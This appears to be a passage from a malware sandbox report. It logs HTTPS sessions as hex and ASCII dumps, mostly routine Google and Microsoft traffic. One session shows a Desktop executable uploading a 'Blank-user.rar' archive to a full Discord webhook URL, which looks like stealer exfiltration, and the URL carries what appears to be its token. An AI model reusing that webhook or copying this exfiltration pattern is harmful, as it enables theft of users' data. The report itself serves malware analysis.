                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:46 UTC1378INData Raw: 3b 64 3c 62 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 63 2b 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 62 5b 64 5d 29 2b 61 5b 64 2b 31 5d 3b 72 65 74 75 72 6e 20 4c 28 63 29 7d 3b 76 61 72 20 73 61 3d 79 28 5b 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 61 70 69 32 2f 61 66 72 61 6d 65 22 5d 29 2c 74 61 3d 50 28 73 61 29 3b 66 75 6e 63 74 69 6f 6e 20 51 28 61 2c 62 2c 63 29 7b 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 26 26 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 62 2c 63 2c 21 31 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 75 61 28 61 2c 62 29 7b 61 2e 73 72 63 3d 72 61 28 62 29 3b 76 61 72 20 63 2c 64 3b 28 63 3d 28 62 3d 28 64 3d 28 63 3d 28 61 2e 6f 77 6e 65 72
                                                                                                                                                                                                                                                                                                                      Data Ascii: ;d<b.length;d++)c+=encodeURIComponent(b[d])+a[d+1];return L(c)};var sa=y(["https://www.google.com/recaptcha/api2/aframe"]),ta=P(sa);function Q(a,b,c){a.addEventListener&&a.addEventListener(b,c,!1)};function ua(a,b){a.src=ra(b);var c,d;(c=(b=(d=(c=(a.owner
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:46 UTC1378INData Raw: 61 64 32 2e 67 6f 6f 67 6c 65 73 79 6e 64 69 63 61 74 69 6f 6e 2e 63 6f 6d 2f 62 67 2f 22 2c 22 2e 6a 73 22 5d 29 3b 66 75 6e 63 74 69 6f 6e 20 52 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 67 3d 77 69 6e 64 6f 77 3b 67 3d 67 3d 3d 3d 76 6f 69 64 20 30 3f 77 69 6e 64 6f 77 3a 67 3b 74 68 69 73 2e 4a 3d 62 3b 74 68 69 73 2e 68 3d 67 3b 74 68 69 73 2e 6f 3d 63 3d 3d 3d 76 6f 69 64 20 30 3f 30 3a 63 3b 74 68 69 73 2e 69 3d 28 64 3d 3d 3d 76 6f 69 64 20 30 3f 30 3a 64 29 3f 50 28 7a 61 2c 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 29 29 3a 50 28 41 61 2c 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 29 29 7d 66 75 6e 63 74 69 6f 6e 20 42 61 28 61 29 7b 72 65 74 75 72 6e 20 49 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 73 77 69 74 63
                                                                                                                                                                                                                                                                                                                      Data Ascii: ad2.googlesyndication.com/bg/",".js"]);function R(a,b,c,d){var g=window;g=g===void 0?window:g;this.J=b;this.h=g;this.o=c===void 0?0:c;this.i=(d===void 0?0:d)?P(za,encodeURIComponent(a)):P(Aa,encodeURIComponent(a))}function Ba(a){return I(function(b){switc
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:46 UTC1378INData Raw: 78 74 3a 46 61 28 61 2e 5f 63 74 78 5f 29 2c 41 3a 61 2e 5f 62 67 76 5f 2c 76 3a 61 2e 5f 62 67 70 5f 2c 47 3a 61 2e 5f 6c 69 5f 2c 46 3a 61 2e 5f 6a 6b 5f 2c 48 3a 47 61 28 61 2e 5f 73 74 5f 29 2c 49 3a 61 2e 5f 72 63 5f 2c 6f 3a 61 2e 5f 64 6c 5f 2c 44 3a 61 2e 5f 67 32 5f 2c 6a 3a 48 61 28 61 2e 5f 61 74 71 67 5f 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4a 61 28 29 7b 76 61 72 20 61 3d 77 69 6e 64 6f 77 3b 69 66 28 61 2e 47 6f 6f 67 6c 65 44 58 35 59 4b 55 53 6b 29 72 65 74 75 72 6e 20 61 2e 47 6f 6f 67 6c 65 44 58 35 59 4b 55 53 6b 5b 30 5d 3b 76 61 72 20 62 3d 6e 65 77 20 72 2e 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 61 2e 47 6f 6f 67 6c 65 44 58 35 59 4b 55 53 6b 3d 5b 62 2c 63 5d 7d 29 3b 72 65 74 75 72 6e 20 62 7d 0a 66 75 6e 63 74
                                                                                                                                                                                                                                                                                                                      Data Ascii: xt:Fa(a._ctx_),A:a._bgv_,v:a._bgp_,G:a._li_,F:a._jk_,H:Ga(a._st_),I:a._rc_,o:a._dl_,D:a._g2_,j:Ha(a._atqg_)}}function Ja(){var a=window;if(a.GoogleDX5YKUSk)return a.GoogleDX5YKUSk[0];var b=new r.Promise(function(c){a.GoogleDX5YKUSk=[b,c]});return b}funct


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      88192.168.2.451249216.58.206.344437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:47 UTC1714OUTGET /pagead/sodar?id=sodar2&v=232&t=2&li=gda_r20241028&jk=2973902258960805&bg=!AwClAE_NAAbaVSD0-lU7ADQBe5WfOOSEgobHspmagji4Y34gS8GJxK4N_jAIGL6FgE-DDSuV5fNfn28dWYbLGun4_afSAgAAATRSAAAADGgBB34ANg_X2_piADoLfOqQQOA8NQKwAekuWzLVSuvoZLdd9eSdIJhrEzYRQYrSQVNS4YxqZD2N3GDoJJkCi95yxmhkSPeChUOagxj1MFy128Rv2EjffhT3l0gLNc43dHQBfjHco6DJRljtjnyAJIbprnUdZt1_KyspGIAxKfF7p61aOLOh6u3TF5-FQl3df5efpW3A_hU2Plmm-xpsCfkGwUsglHrOVnxxTO3ozIS5Xzqi6WG9lBvCiiyCSYTli35DUgxD9AzLi5TOpENxVcEnsCNL1IOalk2WQTvxulNxnzaL1p7kRztXT3PPhFXb_EYwZFPYUe0I6SS6_klRTkwcXvcTzTkgjqklzI62G4vqfgXSa0XSIcOCOoxDV0KPvId1x6eSFQouSf-0QkhZti772W9DUIknqtPAYLXuwfemZpxLt-Ep9WMfkI4aEdYO24YcOhF9Touj1m1lMPcP6lHuexteUdlxGoFUWDzY8WUE6ntRHFmCDTsyZSK2GVSDb8qM1RpgokmVxrp2JAEwo5Q60GcbC7Ez-tU64s0CGfYIfZa3SPMzPnK53cbZLwygjd7foVHdYKhPb6uU9KBgrr_G6q63CkdVOpuiAAdpkoQYwEHw9Qjdxo2IOMFVYKUtGwblDooJHK4k014izc_yji9Va9fyJLOaKHBiXvm1Yv8ZIcee5tHO6B4yCOPCAqaHmjA4YEd7G1iUDV-6SZPKRAsfigzzW8_h2soSKvx1cemtz-dQkfTHaIEOgRD5nigJZioZR9U5t7mGUUHwMMFtPNj38Y_PUytjC_UXE9oGOLui9DttgCsPIf-FLgD48-SRfhuU4lM4v [TRUNCATED]
                                                                                                                                                                                                                                                                                                                      Host: ep1.adtrafficquality.google
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:48 UTC451INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                      P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:47 GMT
                                                                                                                                                                                                                                                                                                                      Server: cafe
                                                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      89192.168.2.451253162.159.128.2334437532C:\Users\user\Desktop\El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:56 UTC302OUTPOST /api/webhooks/1301205706979938325/6QPgIPYq-Css-OJ6_lkSJ5Pdu0MNeXcvPrjnAZiyfOIJh3PJiYs412SWGodn3lagwGj7 HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: discord.com
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                      Content-Length: 387781
                                                                                                                                                                                                                                                                                                                      User-Agent: python-urllib3/2.2.3
                                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=cb25b7fe18ed525b51a049198d45ca7f
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:56 UTC16384OUTData Raw: 2d 2d 63 62 32 35 62 37 66 65 31 38 65 64 35 32 35 62 35 31 61 30 34 39 31 39 38 64 34 35 63 61 37 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 70 3f 09 c0 21 04 00 00 01 0f 52 4c 66 6b 9f 93 a8 23 63 c9 2f 02 cc 5d dc aa b0 54 12 a7 ad 0c 23 f1 fa 69 7d e4 eb 77 6b f7 8e 52 21 97 f1 cc 1c 9e 38 d5 53 8e 80 c1 5c b5 2f 30 7c 68 5f 47 3b 2d 6e df 01 94 9c 1c 4c 23 59 ec 6f cb cb d1 49 8e 94 a0 01 09 c9 56 2d 29 6d 2a 90 cf e3 d0
                                                                                                                                                                                                                                                                                                                      Data Ascii: --cb25b7fe18ed525b51a049198d45ca7fContent-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!p?!RLfk#c/]T#i}wkR!8S\/0|h_G;-nL#YoIV-)m*
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:56 UTC16384OUTData Raw: e5 07 83 3a 5b 53 30 60 a3 dc 49 6d bd bd 02 28 d7 0b 52 2e 9b 4a f0 2c af 03 a0 73 f1 7c 59 1a 6c 55 66 c6 d9 0e 8c 3b ea 9f 47 cf 7e ae 50 f1 da 7c 73 c6 bf 8a a2 cb 5e b2 18 54 3c 73 a8 95 34 31 cf 60 a9 b2 28 02 c7 b9 5d 02 d2 c1 0b 23 40 09 35 83 40 9d 8d 39 a4 d6 7d 43 09 1a 0d 98 40 dc 9e ed d6 13 69 12 1e 84 35 2e 36 fe 52 85 0b 5f ce a0 3f 29 93 45 46 87 96 e0 3d 1d 91 22 59 e3 fd 93 f6 8e f2 89 93 23 91 e2 f8 e4 2c 31 b2 c3 56 b8 a1 f7 7e 5f 56 ad 5d 6c 3d ac 6a 83 bd 31 a4 83 01 56 62 e8 b3 13 c4 8b 5d 93 eb 31 35 2f a4 95 e0 2b fc 42 20 8e 35 ea d3 9e 27 37 0b 27 be 51 22 d3 9c 69 10 98 2f 12 f0 f7 e2 be 25 f2 58 76 7b 8f ac 26 2f a1 e1 e6 bd bd 42 eb 5b 7c 4c e7 65 10 91 37 84 e0 93 f1 9c 53 f9 33 d3 a9 08 72 16 57 6c 61 fa 8a b7 c1 2d 5d 22
                                                                                                                                                                                                                                                                                                                      Data Ascii: :[S0`Im(R.J,s|YlUf;G~P|s^T<s41`(]#@5@9}C@i5.6R_?)EF="Y#,1V~_V]l=j1Vb]15/+B 5'7'Q"i/%Xv{&/B[|Le7S3rWla-]"
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:56 UTC16384OUTData Raw: db 9a c0 07 48 7a 83 ef 24 6d 81 57 01 30 48 d7 f4 22 6a 0e 7f 4c ff 8d 27 2f 2e 74 64 fb 7e 6d a2 ae 6a 56 69 07 ff 8a f0 53 ae 8f 7b 53 59 16 0f 36 23 53 c7 b1 31 60 85 4a 48 db 93 22 ca d9 b2 86 7c 34 1c 22 2e fc 74 7a 30 cd 22 73 2a 84 4b 6e be 18 d9 2b b5 29 60 21 63 e2 48 17 e1 96 fc 26 ce ba ac 93 6a 8d 1c 31 7d f3 10 7c f8 ce 5d d9 c3 13 5f 4d 26 a1 c0 a2 99 f5 bf 8d 2a b4 69 60 7e 37 16 e6 26 62 05 a5 ff 41 e1 4b 27 01 cf 48 1a f9 67 3b 66 f4 dd 69 d3 32 09 9c dc bf f9 5f 48 d1 e2 c9 38 9d bf 89 08 57 37 53 f3 fb 67 0a 5f 8b aa 4d 3f 8e d7 ea a8 42 ab 7d 6a bc d7 50 30 09 5e 55 2f ac e6 4b 8c 97 0b 4f 24 3a 36 97 0a 7e 3b 1a 18 f8 3c ec a2 d1 6f f9 38 79 8d 5a 58 2f 10 60 36 49 fa 5a 7a 65 fd 33 f2 09 81 0e e3 f4 07 4e 33 62 f7 59 cf d3 6d 18 a5
                                                                                                                                                                                                                                                                                                                      Data Ascii: Hz$mW0H"jL'/.td~mjViS{SY6#S1`JH"|4".tz0"s*Kn+)`!cH&j1}|]_M&*i`~7&bAK'Hg;fi2_H8W7Sg_M?B}jP0^U/KO$:6~;<o8yZX/`6IZze3N3bYm
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:56 UTC16384OUTData Raw: c2 15 d4 96 67 0d e5 a3 d1 a5 04 4e da b3 9a 23 66 20 c6 ac a6 5d 6c db 4a a9 22 92 1e df fd 91 7e fc 61 70 12 74 2b c1 e0 59 47 3a a2 da 81 b4 d0 e2 14 b9 75 f8 21 00 de 2e 18 b5 e4 6e 68 ab 08 41 58 73 ab 39 5c d5 e0 db dc ad 31 83 1a 6b 7e 3c c0 fc 13 70 54 99 1f b8 04 32 97 cb 81 95 b5 3e ed 90 2a c7 bf 16 46 31 62 af 70 68 54 f2 32 ef 46 d4 b3 7e 39 49 1f 69 a2 d9 83 c2 43 52 89 40 86 24 ca 99 ab 85 33 bf 1f ba cf ff f4 5c 59 72 af af a7 ea e3 ab a2 73 1a 81 40 fd cc 22 fb 06 1c b5 d1 47 59 c2 45 81 62 47 2c 16 73 cc fd c8 83 16 a0 b4 16 32 24 fc b3 52 54 f3 8e c3 27 b3 02 4e 6e 3b 6a f6 64 3d 7e db 32 75 1e 35 d4 31 9b f7 12 35 9b 99 a3 a8 e6 14 b9 cc df 71 48 2f 80 ee 01 82 be f9 7a 08 95 9f 6a 55 65 e2 e7 25 68 cf 80 b3 c9 5f 73 28 8c c6 f1 08 56
                                                                                                                                                                                                                                                                                                                      Data Ascii: gN#f ]lJ"~apt+YG:u!.nhAXs9\1k~<pT2>*F1bphT2F~9IiCR@$3\Yrs@"GYEbG,s2$RT'Nn;jd=~2u515qH/zjUe%h_s(V
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:56 UTC16384OUTData Raw: 21 84 3a 19 08 30 b1 7f 77 3e 29 ac dc ab 67 f9 2d 59 d6 52 c2 80 da 65 77 59 0b 53 04 68 e7 7b 21 ec d9 50 4f 92 b2 da 3b 9f c1 1f 59 37 39 e2 ec 98 92 96 b2 2b 5e 7c 75 f7 2d 67 89 0f 17 89 f4 bd 0b 21 2e fe 80 af 63 99 12 ec e7 da ad 43 33 18 81 bd 4d be 5e 60 f9 25 cd 57 91 9f 6b c8 38 32 13 7a e6 2a eb 61 8b e2 8c 41 52 e9 77 78 69 0a 19 91 2f 93 d6 07 8f ff af 2c 5e bf 53 02 b7 ff 0d 76 b2 2d 80 b5 1b 70 08 ee f7 59 89 b9 ec fb a7 09 5e 06 62 e4 d5 ad ad 9c 1f 52 02 54 ec ed 5f a6 ec 8a 50 8a 6e 1d aa bc 44 c3 d5 38 ad a7 23 4c 14 6f db aa 48 b4 5f 7a 17 d5 29 9e 07 38 5b 6a 55 59 66 1e 4d 93 fd fe e4 66 2b 3d b1 af e1 a6 fc dd d8 7b 71 d2 01 ef 2a 09 2d 49 20 fe f9 b2 5d 4d 3a 5a 32 72 4d 4e 3f 13 98 4e 94 08 23 c9 52 57 d4 2d 7e 2c 57 e9 02 22 aa
                                                                                                                                                                                                                                                                                                                      Data Ascii: !:0w>)g-YRewYSh{!PO;Y79+^|u-g!.cC3M^`%Wk82z*aARwxi/,^Sv-pY^bRT_PnD8#LoH_z)8[jUYfMf+={q*-I ]M:Z2rMN?N#RW-~,W"
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:56 UTC16384OUTData Raw: 71 44 bf 1e 2b 0b b0 50 6b ca 6d 53 23 f6 43 61 ef 2c 7a a5 9d 75 c2 5b 17 59 9f 5d 05 9e 24 ba 9e be c1 f8 34 00 f4 d5 00 80 50 c4 d7 ef ee 65 45 e8 14 38 28 89 c7 60 3b 5e 97 63 95 a7 87 f7 c3 ef 08 b3 d5 3a 2b 97 ab b5 75 e5 74 ff 7e 33 d5 73 01 a2 79 20 87 e8 e7 8a d4 d1 04 cf eb 83 e3 33 65 cc bc 07 0f 24 ff f5 23 aa e9 4a 66 8a 42 e2 14 1c ba 44 c6 2f 1f 99 84 c4 89 52 8e 84 25 ef ea 5f a3 e6 ea ba 3e f7 74 5a d5 4f b7 76 6f 02 eb bc b5 a4 da a6 16 b5 09 64 35 40 55 12 d9 93 62 fe c8 4e 4b 4e 89 7d 69 24 a8 64 b1 81 d1 9c e5 20 57 86 97 a2 12 75 ae 88 e4 e7 dc 28 0f 8f 55 be 13 97 cf ee 62 15 bd 1a 45 ae a4 71 eb 77 9f 0c 7d 8b db c8 a7 e7 89 68 68 ff 73 d6 40 80 90 f2 c5 84 65 98 74 6e 47 d5 1f 49 42 e5 7b 4b 8f a6 29 7c 8f 41 d4 67 d2 37 b6 df 60
                                                                                                                                                                                                                                                                                                                      Data Ascii: qD+PkmS#Ca,zu[Y]$4PeE8(`;^c:+ut~3sy 3e$#JfBD/R%_>tZOvod5@UbNKN}i$d Wu(UbEqw}hhs@etnGIB{K)|Ag7`
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:56 UTC16384OUTData Raw: 7f 9f 6c 20 fb 40 77 b8 f5 2a 15 bd a0 cb 91 1e e7 a5 1d 79 f6 9b 3d 6b 00 05 14 e5 29 ae c2 e4 9d 52 23 91 e1 1e d6 84 ac 38 0a d5 7c 84 cf b8 89 f6 9c 4b fd cc e6 f7 07 8e e7 2a bd 5d 44 93 b8 43 c2 d3 53 02 7d 68 c7 1f c9 00 15 26 57 4d cd f4 30 a2 1a fc e8 18 57 98 a1 86 c0 a3 22 a2 2c 64 09 f2 e5 47 75 a8 1b 51 13 c9 dc fd e1 3b 1c 6b 78 de 40 ad 79 15 cc 31 0a 26 fe 0f 24 21 4f 2f f3 fd d2 5d 32 4a 7f 8a 77 42 2c 98 a3 b8 5f 86 41 43 01 f0 b7 8c 69 e5 96 4b c9 77 ad b7 7f 1e d5 be 2c 10 00 0a 6f ce 06 0d 0b d7 0a 8f b9 47 b9 31 ae a7 0f 55 7b cd e6 cd cb 4f fb d2 30 2a ea 2b 16 78 ea b4 b7 49 aa d7 11 6e c7 c0 48 b2 49 3b fc aa 4d d7 82 ef 43 2a f4 d4 96 bf 4a 3b 81 ce 03 d9 97 08 98 8f 3c 61 02 7d eb 6b a1 46 8d aa 7e f3 4f 0b 55 32 65 42 45 48 68
                                                                                                                                                                                                                                                                                                                      Data Ascii: l @w*y=k)R#8|K*]DCS}h&WM0W",dGuQ;kx@y1&$!O/]2JwB,_ACiKw,oG1U{O0*+xInHI;MC*J;<a}kF~OU2eBEHh
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:56 UTC16384OUTData Raw: 34 d6 50 6f 02 c5 49 bb 04 b9 6b 1f 99 f9 fc 43 c6 91 6a f4 31 fc 0c 81 ea a3 8c b7 dd 67 d8 13 5b fa c4 dc da ab d2 41 86 44 a1 b2 b6 a3 a8 52 24 0f 78 18 95 52 7e 3d 3f 13 8c be c8 77 1a 20 d9 73 96 f8 a7 41 b8 dc 56 04 84 c3 76 25 12 87 6e e6 fa c3 b1 73 eb 35 5c 2f f9 62 e6 4e 2f 51 66 99 58 0a 00 55 ad 0d e4 f6 ad aa 6b fe 8d 2c 2c 47 76 63 7e 94 18 62 0c b3 87 9b 2d c5 c8 10 a7 2b 26 2b 35 ad 00 4c c5 7c 77 ba 0b 94 be 41 4d f6 40 e6 b1 03 30 e2 b8 8e 9d da f5 5f a8 5f 2d 92 06 ff 07 9f 41 65 5b 30 b4 9a 87 7b a6 f5 47 44 4f 2d 10 02 46 12 dd ce b4 cb b5 dc ce fe 54 ee a6 03 4d bf 6e 61 59 db a9 c3 ae fd 2d 36 d2 88 3c 54 21 1a 9d 95 47 ef 0d f3 7c 07 88 67 2b 73 24 88 18 72 50 e8 d9 ba 81 78 f0 17 94 27 f9 07 e5 9c f5 fb da 01 94 09 74 12 bd f4 95
                                                                                                                                                                                                                                                                                                                      Data Ascii: 4PoIkCj1g[ADR$xR~=?w sAVv%ns5\/bN/QfXUk,,Gvc~b-+&+5L|wAM@0__-Ae[0{GDO-FTMnaY-6<T!G|g+s$rPx't
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:56 UTC16384OUTData Raw: c9 80 f3 3d c6 7f 02 bb b9 dd f0 4c 38 00 d4 ab c4 cc b5 df e2 c4 8e 4a 50 95 98 1d 2a fa ee b0 c3 10 9b bf ec 64 b4 98 cb 82 0c 33 d2 06 9b a1 13 10 c2 4a 8c 1c 88 fc 9f 10 05 62 97 7e 26 9e b6 b2 cd 93 83 f2 12 d8 f7 06 51 84 1b 41 07 1e ff c7 be f5 91 00 9b 72 05 84 6f 4e a3 54 39 13 af 52 09 59 05 f2 37 ed 0f a0 ee a3 2a 81 68 a1 69 1d 3c f5 23 d1 58 0d 3d d8 31 c9 c4 44 aa fb 77 60 26 7d 52 f0 b7 1a a9 20 7f b2 72 12 67 b5 88 d4 dd 66 de de fa 24 91 a1 80 32 80 92 d6 4c 0c f9 0b 31 72 3d 9a 54 f3 5a c0 87 97 30 25 fa 82 a3 d1 de 26 f9 34 f6 e3 cb 7e 5b 16 21 d4 f5 39 ff 06 c5 a7 12 e1 98 28 5c 15 83 42 39 7a 8d 19 0d d4 66 e8 76 18 54 94 53 23 34 2b f6 19 51 fa 1d 45 a8 e5 6f 6a 6e 42 a5 5a 94 5e d8 b8 7c 3f ed 21 9a 95 4d ef 88 32 82 8d 9b 9b 68 3c
                                                                                                                                                                                                                                                                                                                      Data Ascii: =L8JP*d3Jb~&QAroNT9RY7*hi<#X=1Dw`&}R rgf$2L1r=TZ0%&4~[!9(\B9zfvTS#4+QEojnBZ^|?!M2h<
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:56 UTC16384OUTData Raw: 63 3c 00 09 5c 45 3f d0 43 56 35 dc 27 00 7c c3 57 e4 2e 3f ca 50 9a 7f 27 ee 68 fc f1 52 a8 7b 9d 7a 3b 19 bd 2c 18 b6 31 9b e1 6d a4 e0 8a ab 6d bf 69 92 81 fd d1 e9 bd d1 62 74 37 67 45 46 d5 4e c5 02 3f 70 b3 1d 0c f2 d3 55 62 04 ac 3d ac 41 55 9c 2d d2 7a a3 88 9a 78 9a 9c 15 6e 67 2f bb 64 30 9d 3a 59 95 82 86 44 99 d8 4e 36 e9 d6 f2 50 a6 7d 13 62 61 b0 82 d7 6e fd 9a 5a 6a 8b 5c 6c 7f 6e 2d e0 47 a6 df b7 ac 2f fc 78 68 c8 9a 0b 20 9e 69 de 76 a2 59 82 b7 b9 a1 45 20 2e e9 7e 05 83 2a 1b b9 70 0c e1 5e c2 41 cb 74 74 90 57 5c 18 99 b3 62 56 6c fe 17 28 02 b6 dd 2e 2c e9 3d b0 c7 5d ce d1 5d b6 38 84 5f 5f 6e 24 c7 96 e5 7b 8c 38 87 e9 7b 07 75 18 49 ea cf d1 f6 aa 92 01 90 8d 67 d4 32 93 af 11 f4 9a c4 13 81 b6 06 bc 37 49 45 0a 84 68 7b 55 8a 8a
                                                                                                                                                                                                                                                                                                                      Data Ascii: c<\E?CV5'|W.?P'hR{z;,1mmibt7gEFN?pUb=AU-zxng/d0:YDN6P}banZj\ln-G/xh ivYE .~*p^AttW\bVl(.,=]]8__n${8{uIg27IEh{U
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:57 UTC1255INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:57 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Set-Cookie: __dcfduid=bc0a35bc97b411ef83edba4227b15c03; Expires=Tue, 30-Oct-2029 18:19:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                                      x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                                      x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                                      x-ratelimit-reset: 1730398798
                                                                                                                                                                                                                                                                                                                      x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      via: 1.1 google
                                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xqZsnsFNiu3PMjzP25hQVOEcsP0qQTHtO8AF2EuLsKA1tp%2FGb6MTf%2FuDOHIZW9GeajjevZPKq%2BQHYIfnU1oDwo5KZvgJv3x0BR4Z2%2Bijp8mVahTdLEIiG6TeqTKw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                                      Set-Cookie: __sdcfduid=bc0a35bc97b411ef83edba4227b15c0386b6dfc36bd1421e3d75544fe53b03bc05d6510a720f6f3ed2f9a77aefabd99c; Expires=Tue, 30-Oct-2029 18:19:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      90192.168.2.45125413.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:00 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:00 UTC561INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:00 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                      Content-Length: 218853
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
